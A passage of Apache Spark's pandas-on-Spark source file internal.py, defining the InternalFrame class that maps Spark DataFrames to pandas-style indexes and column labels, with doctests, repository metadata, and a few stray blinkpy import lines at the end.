>>> internal.to_pandas_frame # doctest: +NORMALIZE_WHITESPACE
B
A
1 5
2 6
3 7
4 8
"""
def __init__(
self,
spark_frame: SparkDataFrame,
index_spark_columns: Optional[List[Column]],
index_names: Optional[List[Optional[Label]]] = None,
index_fields: Optional[List[InternalField]] = None,
column_labels: Optional[List[Label]] = None,
data_spark_columns: Optional[List[Column]] = None,
data_fields: Optional[List[InternalField]] = None,
column_label_names: Optional[List[Optional[Label]]] = None,
):
"""
Create a new internal immutable DataFrame to manage Spark DataFrame, column fields and
index fields and names.
:param spark_frame: Spark DataFrame to be managed.
:param index_spark_columns: list of Spark Column
Spark Columns for the index.
:param index_names: list of tuples
the index names.
:param index_fields: list of InternalField
the InternalFields for the index columns
:param column_labels: list of tuples with the same length
The multi-level values in the tuples.
:param data_spark_columns: list of Spark Column
Spark Columns to appear as columns. If this is None, calculated
from spark_frame.
:param data_fields: list of InternalField
the InternalFields for the data columns
:param column_label_names: Names for each of the column index levels.
See the examples below to refer what each parameter means.
>>> column_labels = pd.MultiIndex.from_tuples(
... [('a', 'x'), ('a', 'y'), ('b', 'z')], names=["column_labels_a", "column_labels_b"])
>>> row_index = pd.MultiIndex.from_tuples(
... [('foo', 'bar'), ('foo', 'bar'), ('zoo', 'bar')],
... names=["row_index_a", "row_index_b"])
>>> psdf = ps.DataFrame(
... [[1, 2, 3], [4, 5, 6], [7, 8, 9]], index=row_index, columns=column_labels)
>>> psdf.set_index(('a', 'x'), append=True, inplace=True)
>>> psdf # doctest: +NORMALIZE_WHITESPACE
column_labels_a a b
column_labels_b y z
row_index_a row_index_b (a, x)
foo bar 1 2 3
4 5 6
zoo bar 7 8 9
>>> internal = psdf._internal
>>> internal.spark_frame.show() # doctest: +NORMALIZE_WHITESPACE +ELLIPSIS
+-----------------+-----------------+------+------+------+...
|__index_level_0__|__index_level_1__|(a, x)|(a, y)|(b, z)|...
+-----------------+-----------------+------+------+------+...
| foo| bar| 1| 2| 3|...
| foo| bar| 4| 5| 6|...
| zoo| bar| 7| 8| 9|...
+-----------------+-----------------+------+------+------+...
>>> internal.index_spark_columns # doctest: +SKIP
[Column<'__index_level_0__'>, Column<'__index_level_1__'>, Column<'(a, x)'>]
>>> internal.index_names
[('row_index_a',), ('row_index_b',), ('a', 'x')]
>>> internal.index_fields # doctest: +NORMALIZE_WHITESPACE
[InternalField(dtype=object,struct_field=StructField(__index_level_0__,StringType,false)),
InternalField(dtype=object,struct_field=StructField(__index_level_1__,StringType,false)),
InternalField(dtype=int64,struct_field=StructField((a, x),LongType,false))]
>>> internal.column_labels
[('a', 'y'), ('b', 'z')]
>>> internal.data_spark_columns # doctest: +SKIP
[Column<'(a, y)'>, Column<'(b, z)'>]
>>> internal.data_fields # doctest: +NORMALIZE_WHITESPACE
[InternalField(dtype=int64,struct_field=StructField((a, y),LongType,false)),
InternalField(dtype=int64,struct_field=StructField((b, z),LongType,false))]
>>> internal.column_label_names
[('column_labels_a',), ('column_labels_b',)]
"""
assert isinstance(spark_frame, SparkDataFrame)
assert not spark_frame.isStreaming, "pandas-on-Spark does not support Structured Streaming."
if not index_spark_columns:
if data_spark_columns is not None:
if column_labels is not None:
data_spark_columns = [
scol.alias(name_like_string(label))
for scol, label in zip(data_spark_columns, column_labels)
]
spark_frame = spark_frame.select(data_spark_columns)
assert not any(SPARK_INDEX_NAME_PATTERN.match(name) for name in spark_frame.columns), (
"Index columns should not appear in columns of the Spark DataFrame. Avoid "
"index column names [%s]." % SPARK_INDEX_NAME_PATTERN
)
# Create default index.
spark_frame = InternalFrame.attach_default_index(spark_frame)
index_spark_columns = [scol_for(spark_frame, SPARK_DEFAULT_INDEX_NAME)]
index_fields = [
InternalField.from_struct_field(
StructField(SPARK_DEFAULT_INDEX_NAME, LongType(), nullable=False)
)
]
if data_spark_columns is not None:
data_struct_fields = [
field
for field in spark_frame.schema.fields
if field.name != SPARK_DEFAULT_INDEX_NAME
]
data_spark_columns = [
scol_for(spark_frame, field.name) for field in data_struct_fields
]
if data_fields is not None:
data_fields = [
field.copy(
name=name_like_string(struct_field.name),
)
for field, struct_field in zip(data_fields, data_struct_fields)
]
if NATURAL_ORDER_COLUMN_NAME not in spark_frame.columns:
spark_frame = spark_frame.withColumn(
NATURAL_ORDER_COLUMN_NAME, F.monotonically_increasing_id()
)
self._sdf = spark_frame # type: SparkDataFrame
# index_spark_columns
assert all(
isinstance(index_scol, Column) for index_scol in index_spark_columns
), index_spark_columns
self._index_spark_columns = index_spark_columns # type: List[Column]
# data_spark_columns
if data_spark_columns is None:
data_spark_columns = [
scol_for(spark_frame, col)
for col in spark_frame.columns
if all(
not spark_column_equals(scol_for(spark_frame, col), index_scol)
for index_scol in index_spark_columns
)
and col not in HIDDEN_COLUMNS
]
self._data_spark_columns = data_spark_columns # type: List[Column]
else:
assert all(isinstance(scol, Column) for scol in data_spark_columns)
self._data_spark_columns = data_spark_columns
# fields
if index_fields is None:
index_fields = [None] * len(index_spark_columns)
if data_fields is None:
data_fields = [None] * len(data_spark_columns)
assert len(index_spark_columns) == len(index_fields), (
len(index_spark_columns),
len(index_fields),
)
assert len(data_spark_columns) == len(data_fields), (
len(data_spark_columns),
len(data_fields),
)
if any(field is None or field.struct_field is None for field in index_fields) and any(
field is None or field.struct_field is None for field in data_fields
):
schema = spark_frame.select(index_spark_columns + data_spark_columns).schema
fields = [
InternalField.from_struct_field(struct_field)
if field is None
else InternalField(field.dtype, struct_field)
if field.struct_field is None
else field
for field, struct_field in zip(index_fields + data_fields, schema.fields)
]
index_fields = fields[: len(index_spark_columns)]
data_fields = fields[len(index_spark_columns) :]
elif any(field is None or field.struct_field is None for field in index_fields):
schema = spark_frame.select(index_spark_columns).schema
index_fields = [
InternalField.from_struct_field(struct_field)
if field is None
else InternalField(field.dtype, struct_field)
if field.struct_field is None
else field
for field, struct_field in zip(index_fields, schema.fields)
]
elif any(field is None or field.struct_field is None for field in data_fields):
schema = spark_frame.select(data_spark_columns).schema
data_fields = [
InternalField.from_struct_field(struct_field)
if field is None
else InternalField(field.dtype, struct_field)
if field.struct_field is None
else field
for field, struct_field in zip(data_fields, schema.fields)
]
assert all(
isinstance(ops.dtype, Dtype.__args__) # type: ignore
and (
ops.dtype == np.dtype("object")
or as_spark_type(ops.dtype, raise_error=False) is not None
)
for ops in index_fields
), index_fields
if is_testing():
struct_fields = spark_frame.select(index_spark_columns).schema.fields
assert all(
index_field.struct_field == struct_field
for index_field, struct_field in zip(index_fields, struct_fields)
), (index_fields, struct_fields)
self._index_fields = index_fields # type: List[InternalField]
assert all(
isinstance(ops.dtype, Dtype.__args__) # type: ignore
and (
ops.dtype == np.dtype("object")
or as_spark_type(ops.dtype, raise_error=False) is not None
)
for ops in data_fields
), data_fields
if is_testing():
struct_fields = spark_frame.select(data_spark_columns).schema.fields
assert all(
data_field.struct_field == struct_field
for data_field, struct_field in zip(data_fields, struct_fields)
), (data_fields, struct_fields)
self._data_fields = data_fields # type: List[InternalField]
# index_names
if not index_names:
index_names = [None] * len(index_spark_columns)
assert len(index_spark_columns) == len(index_names), (
len(index_spark_columns),
len(index_names),
)
assert all(
is_name_like_tuple(index_name, check_type=True) for index_name in index_names
), index_names
self._index_names = index_names # type: List[Optional[Label]]
# column_labels
if column_labels is None:
self._column_labels = [
(col,) for col in spark_frame.select(self._data_spark_columns).columns
] # type: List[Label]
else:
assert len(column_labels) == len(self._data_spark_columns), (
len(column_labels),
len(self._data_spark_columns),
)
if len(column_labels) == 1:
column_label = column_labels[0]
assert is_name_like_tuple(column_label, check_type=True), column_label
else:
assert all(
is_name_like_tuple(column_label, check_type=True)
for column_label in column_labels
), column_labels
assert len(set(len(label) for label in column_labels)) <= 1, column_labels
self._column_labels = column_labels
# column_label_names
if column_label_names is None:
self._column_label_names = [None] * column_labels_level(
self._column_labels
) # type: List[Optional[Label]]
else:
if len(self._column_labels) > 0:
assert len(column_label_names) == column_labels_level(self._column_labels), (
len(column_label_names),
column_labels_level(self._column_labels),
)
else:
assert len(column_label_names) > 0, len(column_label_names)
assert all(
is_name_like_tuple(column_label_name, check_type=True)
for column_label_name in column_label_names
), column_label_names
self._column_label_names = column_label_names
@staticmethod
def attach_default_index(
sdf: SparkDataFrame, default_index_type: Optional[str] = None
) -> SparkDataFrame:
"""
This method attaches a default index to Spark DataFrame. Spark does not have the index
notion so corresponding column should be generated.
There are several types of default index can be configured by `compute.default_index_type`.
>>> spark_frame = ps.range(10).to_spark()
>>> spark_frame
DataFrame[id: bigint]
It adds the default index column '__index_level_0__'.
>>> spark_frame = InternalFrame.attach_default_index(spark_frame)
>>> spark_frame
DataFrame[__index_level_0__: bigint, id: bigint]
It throws an exception if the given column name already exists.
>>> InternalFrame.attach_default_index(spark_frame)
... # doctest: +ELLIPSIS
Traceback (most recent call last):
...
AssertionError: '__index_level_0__' already exists...
"""
index_column = SPARK_DEFAULT_INDEX_NAME
assert (
index_column not in sdf.columns
), "'%s' already exists in the Spark column names '%s'" % (index_column, sdf.columns)
if default_index_type is None:
default_index_type = ps.get_option("compute.default_index_type")
if default_index_type == "sequence":
return InternalFrame.attach_sequence_column(sdf, column_name=index_column)
elif default_index_type == "distributed-sequence":
return InternalFrame.attach_distributed_sequence_column(sdf, column_name=index_column)
elif default_index_type == "distributed":
return InternalFrame.attach_distributed_column(sdf, column_name=index_column)
else:
raise ValueError(
"'compute.default_index_type' should be one of 'sequence',"
" 'distributed-sequence' and 'distributed'"
)
@staticmethod
def attach_sequence_column(sdf: SparkDataFrame, column_name: str) -> SparkDataFrame:
scols = [scol_for(sdf, column) for column in sdf.columns]
sequential_index = (
F.row_number().over(Window.orderBy(F.monotonically_increasing_id())).cast("long") - 1
)
return sdf.select(sequential_index.alias(column_name), *scols)
@staticmethod
def attach_distributed_column(sdf: SparkDataFrame, column_name: str) -> SparkDataFrame:
scols = [scol_for(sdf, column) for column in sdf.columns]
return sdf.select(F.monotonically_increasing_id().alias(column_name), *scols)
@staticmethod
def attach_distributed_sequence_column(sdf: SparkDataFrame, column_name: str) -> SparkDataFrame:
"""
This method attaches a Spark column that has a sequence in a distributed manner.
This is equivalent to the column assigned when default index type 'distributed-sequence'.
>>> sdf = ps.DataFrame(['a', 'b', 'c']).to_spark()
>>> sdf = InternalFrame.attach_distributed_sequence_column(sdf, column_name="sequence")
>>> sdf.show() # doctest: +NORMALIZE_WHITESPACE
+--------+---+
|sequence| 0|
+--------+---+
| 0| a|
| 1| b|
| 2| c|
+--------+---+
"""
if len(sdf.columns) > 0:
return SparkDataFrame(
sdf._jdf.toDF().withSequenceColumn(column_name), # type: ignore
sdf.sql_ctx,
)
else:
cnt = sdf.count()
if cnt > 0:
return default_session().range(cnt).toDF(column_name)
else:
return default_session().createDataFrame(
[], schema=StructType().add(column_name, data_type=LongType(), nullable=False)
)
def spark_column_for(self, label: Label) -> Column:
"""Return Spark Column for the given column label."""
column_labels_to_scol = dict(zip(self.column_labels, self.data_spark_columns))
if label in column_labels_to_scol:
return column_labels_to_scol[label]
else:
raise KeyError(name_like_string(label))
def spark_column_name_for(self, label_or_scol: Union[Label, Column]) -> str:
"""Return the actual Spark column name for the given column label."""
if isinstance(label_or_scol, Column):
return self.spark_frame.select(label_or_scol).columns[0]
else:
return self.field_for(label_or_scol).name
def spark_type_for(self, label_or_scol: Union[Label, Column]) -> DataType:
"""Return DataType for the given column label."""
if isinstance(label_or_scol, Column):
return self.spark_frame.select(label_or_scol).schema[0].dataType
else:
return self.field_for(label_or_scol).spark_type
def spark_column_nullable_for(self, label_or_scol: Union[Label, Column]) -> bool:
"""Return nullability for the given column label."""
if isinstance(label_or_scol, Column):
return self.spark_frame.select(label_or_scol).schema[0].nullable
else:
return self.field_for(label_or_scol).nullable
def field_for(self, label: Label) -> InternalField:
"""Return InternalField for the given column label."""
column_labels_to_fields = dict(zip(self.column_labels, self.data_fields))
if label in column_labels_to_fields:
return column_labels_to_fields[label]
else:
raise KeyError(name_like_string(label))
@property
def spark_frame(self) -> SparkDataFrame:
"""Return the managed Spark DataFrame."""
return self._sdf
@lazy_property
def data_spark_column_names(self) -> List[str]:
"""Return the managed column field names."""
return [field.name for field in self.data_fields]
@property
def data_spark_columns(self) -> List[Column]:
"""Return Spark Columns for the managed data columns."""
return self._data_spark_columns
@property
def index_spark_column_names(self) -> List[str]:
"""Return the managed index field names."""
return [field.name for field in self.index_fields]
@property
def index_spark_columns(self) -> List[Column]:
"""Return Spark Columns for the managed index columns."""
return self._index_spark_columns
@lazy_property
def spark_column_names(self) -> List[str]:
"""Return all the field names including index field names."""
return self.spark_frame.select(self.spark_columns).columns
@lazy_property
def spark_columns(self) -> List[Column]:
"""Return Spark Columns for the managed columns including index columns."""
index_spark_columns = self.index_spark_columns
return index_spark_columns + [
spark_column
for spark_column in self.data_spark_columns
if all(not spark_column_equals(spark_column, scol) for scol in index_spark_columns)
]
@property
def index_names(self) -> List[Optional[Label]]:
"""Return the managed index names."""
return self._index_names
@lazy_property
def index_level(self) -> int:
"""Return the level of the index."""
return len(self._index_names)
@property
def column_labels(self) -> List[Label]:
"""Return the managed column index."""
return self._column_labels
@lazy_property
def column_labels_level(self) -> int:
"""Return the level of the column index."""
return len(self._column_label_names)
@property
def column_label_names(self) -> List[Optional[Label]]:
"""Return names of the index levels."""
return self._column_label_names
@property
def index_fields(self) -> List[InternalField]:
"""Return InternalFields for the managed index columns."""
return self._index_fields
@property
def data_fields(self) -> List[InternalField]:
"""Return InternalFields for the managed columns."""
return self._data_fields
@lazy_property
def to_internal_spark_frame(self) -> SparkDataFrame:
"""
Return as Spark DataFrame. This contains index columns as well
and should be only used for internal purposes.
"""
index_spark_columns = self.index_spark_columns
data_columns = []
for spark_column in self.data_spark_columns:
if all(not spark_column_equals(spark_column, scol) for scol in index_spark_columns):
data_columns.append(spark_column)
return self.spark_frame.select(index_spark_columns + data_columns)
@lazy_property
def to_pandas_frame(self) -> pd.DataFrame:
"""Return as pandas DataFrame."""
sdf = self.to_internal_spark_frame
pdf = sdf.toPandas()
if len(pdf) == 0 and len(sdf.schema) > 0:
pdf = pdf.astype(
{field.name: spark_type_to_pandas_dtype(field.dataType) for field in sdf.schema}
)
return InternalFrame.restore_index(pdf, **self.arguments_for_restore_index)
@lazy_property
def arguments_for_restore_index(self) -> Dict:
"""Create arguments for `restore_index`."""
column_names = []
fields = self.index_fields.copy()
for spark_column, column_name, field in zip(
self.data_spark_columns, self.data_spark_column_names, self.data_fields
):
for index_spark_column_name, index_spark_column in zip(
self.index_spark_column_names, self.index_spark_columns
):
if spark_column_equals(spark_column, index_spark_column):
column_names.append(index_spark_column_name)
break
else:
column_names.append(column_name)
fields.append(field)
return dict(
index_columns=self.index_spark_column_names,
index_names=self.index_names,
data_columns=column_names,
column_labels=self.column_labels,
column_label_names=self.column_label_names,
fields=fields,
)
@staticmethod
def restore_index(
pdf: pd.DataFrame,
*,
index_columns: List[str],
index_names: List[Label],
data_columns: List[str],
column_labels: List[Label],
column_label_names: List[Label],
fields: List[InternalField] = None,
) -> pd.DataFrame:
"""
Restore pandas DataFrame indices using the metadata.
:param pdf: the pandas DataFrame to be processed.
:param index_columns: the original column names for index columns.
:param index_names: the index names after restored.
:param data_columns: the original column names for data columns.
:param column_labels: the column labels after restored.
:param column_label_names: the column label names after restored.
:param fields: the fields after restored.
:return: the restored pandas DataFrame
>>> from numpy import dtype
>>> pdf = pd.DataFrame({"index": [10, 20, 30], "a": ['a', 'b', 'c'], "b": [0, 2, 1]})
>>> InternalFrame.restore_index(
... pdf,
... index_columns=["index"],
... index_names=[("idx",)],
... data_columns=["a", "b", "index"],
... column_labels=[("x",), ("y",), ("z",)],
... column_label_names=[("lv1",)],
... fields=[
... InternalField(
... dtype=dtype('int64'),
... struct_field=StructField(name='index', dataType=LongType(), nullable=False),
... ),
... InternalField(
... dtype=dtype('object'),
... struct_field=StructField(name='a', dataType=StringType(), nullable=False),
... ),
... InternalField(
... dtype=CategoricalDtype(categories=["i", "j", "k"]),
... struct_field=StructField(name='b', dataType=LongType(), nullable=False),
... ),
... ],
... ) # doctest: +NORMALIZE_WHITESPACE
lv1 x y z
idx
10 a i 10
20 b k 20
30 c j 30
"""
for col, field in zip(pdf.columns, fields):
pdf[col] = DataTypeOps(field.dtype, field.spark_type).restore(pdf[col])
append = False
for index_field in index_columns:
drop = index_field not in data_columns
pdf = pdf.set_index(index_field, drop=drop, append=append)
append = True
pdf = pdf[data_columns]
pdf.index.names = [
name if name is None or len(name) > 1 else name[0] for name in index_names
]
names = [name if name is None or len(name) > 1 else name[0] for name in column_label_names]
if len(column_label_names) > 1:
pdf.columns = pd.MultiIndex.from_tuples(column_labels, names=names)
else:
pdf.columns = pd.Index(
[None if label is None else label[0] for label in column_labels],
name=names[0],
)
return pdf
@lazy_property
def resolved_copy(self) -> "InternalFrame":
"""Copy the immutable InternalFrame with the updates resolved."""
sdf = self.spark_frame.select(self.spark_columns + list(HIDDEN_COLUMNS))
return self.copy(
spark_frame=sdf,
index_spark_columns=[scol_for(sdf, col) for col in self.index_spark_column_names],
data_spark_columns=[scol_for(sdf, col) for col in self.data_spark_column_names],
)
def with_new_sdf(
self,
spark_frame: SparkDataFrame,
*,
index_fields: Optional[List[InternalField]] = None,
data_columns: Optional[List[str]] = None,
data_fields: Optional[List[InternalField]] = None,
) -> "InternalFrame":
"""Copy the immutable InternalFrame with the updates by the specified Spark DataFrame.
:param spark_frame: the new Spark DataFrame
:param index_fields: the new InternalFields for the index columns.
If None, the original dtyeps are used.
:param data_columns: the new column names. If None, the original one is used.
:param data_fields: the new InternalFields for the data columns.
If None, the original dtyeps are used.
:return: the copied InternalFrame.
"""
if index_fields is None:
index_fields = self.index_fields
else:
assert len(index_fields) == len(self.index_fields), (
len(index_fields),
len(self.index_fields),
)
if data_columns is None:
data_columns = self.data_spark_column_names
else:
assert len(data_columns) == len(self.column_labels), (
len(data_columns),
len(self.column_labels),
)
if data_fields is None:
data_fields = self.data_fields
else:
assert len(data_fields) == len(self.column_labels), (
len(data_fields),
len(self.column_labels),
)
sdf = spark_frame.drop(NATURAL_ORDER_COLUMN_NAME)
return self.copy(
spark_frame=sdf,
index_spark_columns=[scol_for(sdf, col) for col in self.index_spark_column_names],
index_fields=index_fields,
data_spark_columns=[scol_for(sdf, col) for col in data_columns],
data_fields=data_fields,
)
def with_new_columns(
self,
scols_or_pssers: Sequence[Union[Column, "Series"]],
*,
column_labels: Optional[List[Label]] = None,
data_fields: Optional[List[InternalField]] = None,
column_label_names: Union[Optional[List[Optional[Label]]], _NoValueType] = _NoValue,
keep_order: bool = True,
) -> "InternalFrame":
"""
Copy the immutable InternalFrame with the updates by the specified Spark Columns or Series.
:param scols_or_pssers: the new Spark Columns or Series.
:param column_labels: the new column index.
If None, the column_labels of the corresponding `scols_or_pssers` is used if it is
Series; otherwise the original one is used.
:param data_fields: the new InternalFields for the data columns.
If None, the dtypes of the corresponding `scols_or_pssers` is used if it is Series;
otherwise the dtypes will be inferred from the corresponding `scols_or_pssers`.
:param column_label_names: the new names of the column index levels.
:return: the copied InternalFrame.
"""
from pyspark.pandas.series import Series
if column_labels is None:
if all(isinstance(scol_or_psser, Series) for scol_or_psser in scols_or_pssers):
column_labels = [cast(Series, psser)._column_label for psser in scols_or_pssers]
else:
assert len(scols_or_pssers) == len(self.column_labels), (
len(scols_or_pssers),
len(self.column_labels),
)
column_labels = []
for scol_or_psser, label in zip(scols_or_pssers, self.column_labels):
if isinstance(scol_or_psser, Series):
column_labels.append(scol_or_psser._column_label)
else:
column_labels.append(label)
else:
assert len(scols_or_pssers) == len(column_labels), (
len(scols_or_pssers),
len(column_labels),
)
data_spark_columns = []
for scol_or_psser in scols_or_pssers:
if isinstance(scol_or_psser, Series):
scol = scol_or_psser.spark.column
else:
scol = scol_or_psser
data_spark_columns.append(scol)
if data_fields is None:
data_fields = []
for scol_or_psser in scols_or_pssers:
if isinstance(scol_or_psser, Series):
data_fields.append(scol_or_psser._internal.data_fields[0])
else:
data_fields.append(None)
else:
assert len(scols_or_pssers) == len(data_fields), (
len(scols_or_pssers),
len(data_fields),
)
sdf = self.spark_frame
if not keep_order:
sdf = self.spark_frame.select(self.index_spark_columns + data_spark_columns)
index_spark_columns = [scol_for(sdf, col) for col in self.index_spark_column_names]
data_spark_columns = [
scol_for(sdf, col) for col in self.spark_frame.select(data_spark_columns).columns
]
else:
index_spark_columns = self.index_spark_columns
if column_label_names is _NoValue:
column_label_names = self._column_label_names
return self.copy(
spark_frame=sdf,
index_spark_columns=index_spark_columns,
column_labels=column_labels,
data_spark_columns=data_spark_columns,
data_fields=data_fields,
column_label_names=column_label_names,
)
def with_filter(self, pred: Union[Column, "Series"]) -> "InternalFrame":
"""
Copy the immutable InternalFrame with the updates by the predicate.
:param pred: the predicate to filter.
:return: the copied InternalFrame.
"""
from pyspark.pandas.series import Series
if isinstance(pred, Series):
assert isinstance(pred.spark.data_type, BooleanType), pred.spark.data_type
condition = pred.spark.column
else:
condition = pred
spark_type = self.spark_frame.select(condition).schema[0].dataType
assert isinstance(spark_type, BooleanType), spark_type
return self.with_new_sdf(self.spark_frame.filter(condition).select(self.spark_columns))
def with_new_spark_column(
self,
column_label: Label,
scol: Column,
*,
field: Optional[InternalField] = None,
keep_order: bool = True,
) -> "InternalFrame":
"""
Copy the immutable InternalFrame with the updates by the specified Spark Column.
:param column_label: the column label to be updated.
:param scol: the new Spark Column
:param field: the new InternalField for the data column.
If not specified, the InternalField will be inferred from the spark Column.
:return: the copied InternalFrame.
"""
assert column_label in self.column_labels, column_label
idx = self.column_labels.index(column_label)
data_spark_columns = self.data_spark_columns.copy()
data_spark_columns[idx] = scol
data_fields = self.data_fields.copy()
data_fields[idx] = field
return self.with_new_columns(
data_spark_columns, data_fields=data_fields, keep_order=keep_order
)
def select_column(self, column_label: Label) -> "InternalFrame":
"""
Copy the immutable InternalFrame with the specified column.
:param column_label: the column label to use.
:return: the copied InternalFrame.
"""
assert column_label in self.column_labels, column_label
return self.copy(
column_labels=[column_label],
data_spark_columns=[self.spark_column_for(column_label)],
data_fields=[self.field_for(column_label)],
column_label_names=None,
)
def copy(
self,
*,
spark_frame: Union[SparkDataFrame, _NoValueType] = _NoValue,
index_spark_columns: Union[List[Column], _NoValueType] = _NoValue,
index_names: Union[Optional[List[Optional[Label]]], _NoValueType] = _NoValue,
index_fields: Union[Optional[List[InternalField]], _NoValueType] = _NoValue,
column_labels: Union[Optional[List[Label]], _NoValueType] = _NoValue,
data_spark_columns: Union[Optional[List[Column]], _NoValueType] = _NoValue,
data_fields: Union[Optional[List[InternalField]], _NoValueType] = _NoValue,
column_label_names: Union[Optional[List[Optional[Label]]], _NoValueType] = _NoValue,
) -> "InternalFrame":
"""
Copy the immutable InternalFrame.
:param spark_frame: the new Spark DataFrame. If not specified, the original one is used.
:param index_spark_columns: the list of Spark Column.
If not specified, the original ones are used.
:param index_names: the index names. If not specified, the original ones are used.
:param index_fields: the new InternalFields for the index columns.
If not specified, the original metadata are used.
:param column_labels: the new column labels. If not specified, the original ones are used.
:param data_spark_columns: the new Spark Columns.
If not specified, the original ones are used.
:param data_fields: the new InternalFields for the data columns.
If not specified, the original metadata are used.
:param column_label_names: the new names of the column index levels.
If not specified, the original ones are used.
:return: the copied immutable InternalFrame.
"""
if spark_frame is _NoValue:
spark_frame = self.spark_frame
if index_spark_columns is _NoValue:
index_spark_columns = self.index_spark_columns
if index_names is _NoValue:
index_names = self.index_names
if index_fields is _NoValue:
index_fields = self.index_fields
if column_labels is _NoValue:
column_labels = self.column_labels
if data_spark_columns is _NoValue:
data_spark_columns = self.data_spark_columns
if data_fields is _NoValue:
data_fields = self.data_fields
if column_label_names is _NoValue:
column_label_names = self.column_label_names
return InternalFrame(
spark_frame=cast(SparkDataFrame, spark_frame),
index_spark_columns=cast(List[Column], index_spark_columns),
index_names=cast(Optional[List[Optional[Label]]], index_names),
index_fields=cast(Optional[List[InternalField]], index_fields),
column_labels=cast(Optional[List[Label]], column_labels),
data_spark_columns=cast(Optional[List[Column]], data_spark_columns),
data_fields=cast(Optional[List[InternalField]], data_fields),
column_label_names=cast(Optional[List[Optional[Label]]], column_label_names),
)
@staticmethod
def from_pandas(pdf: pd.DataFrame) -> "InternalFrame":
"""Create an immutable DataFrame from pandas DataFrame.
:param pdf: :class:`pd.DataFrame`
:return: the created immutable DataFrame
"""
index_names = [
name if name is None or isinstance(name, tuple) else (name,) for name in pdf.index.names
] # type: List[Optional[Label]]
columns = pdf.columns
if isinstance(columns, pd.MultiIndex):
column_labels = columns.tolist() # type: List[Label]
else:
column_labels = [(col,) for col in columns]
column_label_names = [
name if name is None or isinstance(name, tuple) else (name,) for name in columns.names
] # type: List[Optional[Label]]
(
pdf,
index_columns,
index_fields,
data_columns,
data_fields,
) = InternalFrame.prepare_pandas_frame(pdf)
schema = StructType([field.struct_field for field in index_fields + data_fields])
sdf = default_session().createDataFrame(pdf, schema=schema)
return InternalFrame(
spark_frame=sdf,
index_spark_columns=[scol_for(sdf, col) for col in index_columns],
index_names=index_names,
index_fields=index_fields,
column_labels=column_labels,
data_spark_columns=[scol_for(sdf, col) for col in data_columns],
data_fields=data_fields,
column_label_names=column_label_names,
)
@staticmethod
def prepare_pandas_frame(
pdf: pd.DataFrame, *, retain_index: bool = True
) -> Tuple[pd.DataFrame, List[str], List[InternalField], List[str], List[InternalField]]:
"""
Prepare pandas DataFrame for creating Spark DataFrame.
:param pdf: the pandas DataFrame to be prepared.
:param retain_index: whether the indices should be retained.
:return: the tuple of
- the prepared pandas dataFrame
- index column names for Spark DataFrame
- the InternalFields for the index columns of the given pandas DataFrame
- data column names for Spark DataFrame
- the InternalFields for the data columns of the given pandas DataFrame
>>> pdf = pd.DataFrame(
... {("x", "a"): ['a', 'b', 'c'],
... ("y", "b"): pd.Categorical(["i", "k", "j"], categories=["i", "j", "k"])},
... index=[10, 20, 30])
>>> prepared, index_columns, index_fields, data_columns, data_fields = (
... InternalFrame.prepare_pandas_frame(pdf)
... )
>>> prepared
__index_level_0__ (x, a) (y, b)
0 10 a 0
1 20 b 2
2 30 c 1
>>> index_columns
['__index_level_0__']
>>> index_fields
[InternalField(dtype=int64,struct_field=StructField(__index_level_0__,LongType,false))]
>>> data_columns
['(x, a)', '(y, b)']
>>> data_fields # doctest: +NORMALIZE_WHITESPACE
[InternalField(dtype=object,struct_field=StructField((x, a),StringType,false)),
InternalField(dtype=category,struct_field=StructField((y, b),ByteType,false))]
"""
pdf = pdf.copy()
data_columns = [name_like_string(col) for col in pdf.columns]
pdf.columns = data_columns
if retain_index:
index_nlevels = pdf.index.nlevels
index_columns = [SPARK_INDEX_NAME_FORMAT(i) for i in range(index_nlevels)]
pdf.index.names = index_columns
reset_index = pdf.reset_index()
else:
index_nlevels = 0
index_columns = []
reset_index = pdf
index_dtypes = list(reset_index.dtypes)[:index_nlevels]
data_dtypes = list(reset_index.dtypes)[index_nlevels:]
for col, dtype in zip(reset_index.columns, reset_index.dtypes):
spark_type = infer_pd_series_spark_type(reset_index[col], dtype)
reset_index[col] = DataTypeOps(dtype, spark_type).prepare(reset_index[col])
fields = [
InternalField(
dtype=dtype,
struct_field=StructField(
name=name,
dataType=infer_pd_series_spark_type(col, dtype),
nullable=bool(col.isnull().any()),
),
)
for (name, col), dtype in zip(reset_index.iteritems(), index_dtypes + data_dtypes)
]
return (
reset_index,
index_columns,
fields[:index_nlevels],
data_columns,
fields[index_nlevels:],
)
def _test() -> None:
import os
import doctest
import sys
from pyspark.sql import SparkSession
import pyspark.pandas.internal
os.chdir(os.environ["SPARK_HOME"])
globs = pyspark.pandas.internal.__dict__.copy()
globs["ps"] = pyspark.pandas
spark = (
SparkSession.builder.master("local[4]")
.appName("pyspark.pandas.internal tests")
.getOrCreate()
)
(failure_count, test_count) = doctest.testmod(
pyspark.pandas.internal,
globs=globs,
optionflags=doctest.ELLIPSIS | doctest.NORMALIZE_WHITESPACE,
)
spark.stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
| {
"content_hash": "61da0cf903398e6616a81a36c4e719dd",
"timestamp": "",
"source": "github",
"line_count": 1567,
"max_line_length": 100,
"avg_line_length": 40.029993618379066,
"alnum_prop": 0.5485197761729399,
"repo_name": "jiangxb1987/spark",
"id": "53bb9644fd89266ebae4bd5e101a72c08c71c943",
"size": "63512",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "python/pyspark/pandas/internal.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ANTLR",
"bytes": "50024"
},
{
"name": "Batchfile",
"bytes": "31352"
},
{
"name": "C",
"bytes": "1493"
},
{
"name": "CSS",
"bytes": "26836"
},
{
"name": "Dockerfile",
"bytes": "9014"
},
{
"name": "HTML",
"bytes": "41387"
},
{
"name": "HiveQL",
"bytes": "1890736"
},
{
"name": "Java",
"bytes": "4123643"
},
{
"name": "JavaScript",
"bytes": "203741"
},
{
"name": "Makefile",
"bytes": "7776"
},
{
"name": "PLpgSQL",
"bytes": "380679"
},
{
"name": "PowerShell",
"bytes": "3865"
},
{
"name": "Python",
"bytes": "3130521"
},
{
"name": "R",
"bytes": "1186948"
},
{
"name": "Roff",
"bytes": "21950"
},
{
"name": "SQLPL",
"bytes": "9325"
},
{
"name": "Scala",
"bytes": "31707827"
},
{
"name": "Shell",
"bytes": "203944"
},
{
"name": "TSQL",
"bytes": "466993"
},
{
"name": "Thrift",
"bytes": "67584"
},
{
"name": "q",
"bytes": "79845"
}
],
"symlink_target": ""
} |
from blinkpy.common.checkout.git_mock import MockGit
from blinkpy.common.net.results_fetcher_mock import MockTestResultsFetcher
from blinkpy.common.net.web_mock import MockWeb
